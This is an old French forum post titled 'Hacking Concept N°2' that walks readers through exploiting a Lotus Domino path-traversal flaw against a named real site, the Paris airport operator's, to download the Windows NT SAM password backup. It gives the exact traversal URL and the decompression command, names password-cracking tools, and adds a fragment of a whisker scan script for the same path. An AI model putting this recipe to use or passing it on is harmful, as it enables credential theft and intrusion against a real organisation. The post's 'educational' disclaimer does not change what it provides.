Kitetoa-Bla-Bla

[ Page d'accueil | Sommaire | Recherche | Nouveau | Répondre | Suivant | Précédent | Remonter ]


HACKING CONCEPT N°2

De: Passant
Date: 13 Jan 2001
Time: 23:36:15
Remote Name: 194.230.154.224

Commentaires

Si vous faites quelques visites sur le site de Securityfocus vous y découvrer des choses très très intéressante. Par exemple une faille énorme sous Lotus Domino Web Server

http://www.securityfocus.com/vdb/bottom.html?vid=2173

Hein quoi ??? Ben oui avec ce joli bug il est possible de télécharger n'importe quel fichier sur le serveur depuis la racine, pour peut que vous connaissiez le chemin d'accès.

Mise en pratique. www.adp.fr => Aeroport de Paris. Ce site tourne sous (Lotus-Domino/WinNT)

Devinez dans quel dossier WinNT enregistre les mots de passe. C:\winnt\system32\config\sam

Vous me direz oui mais l'accès est interdit... Hmm zut que faire alors ?? Le fichier de sauvegarde :-)) www.adp.fr/.nsf/../winnt/repair/sam._ ET hop une petite fenetre save as qui s'affiche :-)

Comment je craque ça ?? John,L0phtCrack Pi voila Lister les partages d'une station a distance.. Bonne chance...allez faire une tour sur les sites de www.wiretrip.net/rfp/,www.nmrc.org,

Note 1: Le fichier sam._ est compressé, ce qui veut dire qu'il vous faut le décompresser à l'aide de la commande expand de windows NT => Expand sam._ sam Note 2: L'exploit ne fonctionne pas avec Internet Explorer qui a une drole de tendance a auto-corriger l'URL.... Note 3: Je ne suis pas responsable de ce que vous faites de ce info, c'est juste à but éducatif..

Je crois que c'est le genre de faille que Kitetoa apprécie :-) 100% Browswer (la phase pour obtenir le password)

Contribution => Script pour whisker

scan () / >> .nsf/../winnt/repair/sam._ if XXRet == 401 print + 200 OK: GET .nsf/../winnt/repair/sam._ endif

A ben oui j'ai pas tous mis.. Je vais pas vous macher le boulot :-)


Dernière modification : 25 June 2001